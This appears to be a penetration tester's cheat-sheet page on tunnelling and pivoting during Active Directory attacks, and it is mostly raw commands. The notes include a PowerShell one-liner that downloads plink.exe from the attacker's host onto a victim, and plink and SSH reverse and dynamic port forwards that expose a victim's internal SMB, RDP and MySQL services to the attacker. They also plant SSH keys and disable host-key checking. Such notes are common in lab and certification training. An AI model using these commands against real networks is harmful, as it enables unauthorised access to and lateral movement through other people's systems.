AD Attack Tunneling / (with SSH key) Burp > proxychains > app: Settings > Network > Connections > SOCKS Proxy
sudo netstat -tulpn to check tunnel connections
plink ssh to kali from victim
Copy #victim
netstat - ano #to see undiscovered service during nmap
#kali
python - m http.server 8080 #to host plink
service ssh start
#victim
powershell ( New-Object System.Net.WebClient).DownloadFile( 'http://192.168.119.158:8080/plink.exe' , 'C:/hfs/tmp/plink.exe' )
cmd.exe / c echo y | plink.exe - ssh - l kali - pw kalipwd - R 192.168 . 119.158 : 7799 : 127.0 . 0.1 : 445 192.168 . 119.158
#kali
nmap - sT - sV - sC 127.0 . 0.1 7799 :445 = internal service ; :7799 = kali tunnel port to the target :445
Copy #machine C
plink.exe - ssh - l b.user - pw b.pwd - N - R 10.1 . 1.9 : 1069 : 127.0 . 0.1 : 9050 10.1 . 1.9
#machine B 10.1.1.9
plink.exe - ssh - l kali - pw kalipwd - N - R 192.168 . 119.158 : 7799 : 127.0 . 0.1 : 1069 192.168 . 119.158
tunneling machine C :9050 to kali :7799 through machine B :1069
ssh to victim from kali
Copy /etc/proxychains4.conf:
socks4 127.0.0.1 9050
socks4 127.0.0.1 9060
sudo ssh -N -D 127.0.0.1:9050 sean@10.11.1.251
sudo ssh -N -D 127.0.0.1:9060 j0hn@10.11.1.252 -p 22000 -o KexAlgorithms=+diffie-hellman-group1-sha1 -o HostKeyAlgorithms=+ssh-rsa may use -i {cracked key id} flag if have Authorized_key cracked
or -i {authorized_key} if placed kali's key in the victim
pivot machine 8888 to windows victim 3389 (need victim pw)
Copy ssh -L 8888:192.168.1.90:3389 root@192.168.1.90 #-f bg
( on pivot machine rdp 127.0.0.1:8888) kali connect to pivot machine 8888 to final victim 3389
Copy rdp 192.168.2.90:8888 ssh from victim to kali
after finding which port is opened on the next client from 1st victim
Copy # bind next client :22 to kali 1122, next client 3306 to kali 13306
ssh -f -N -R 1122:10.5.5.11:22 -R 13306:10.5.5.11:3306 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i /tmp/keys/id_rsa kali@192.168.45.5 prevent ssh from asking for kali pwd with id_rsa
Copy # in /tmp on 1st victim
mkdir keys
cd keys
ssh-keygen
> /tmp/keys/id_rsa
cat id_rsa.pub
cop to kali ~/.ssh/authorized_keys dynamic port forwarding
Copy /etc/proxychains4.conf:
socks4 127.0.0.1 9050
ssh -f -N -R 9050 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i
/tmp/keys/id_rsa kali@192.168.119.173 windows allowing other access local :80
Copy # 192.168.1.90:8080 = victim:80 (initiate from victim)
ssh -R 8080:internalwww:80 user@192.168.1.90 Last updated 9 months ago
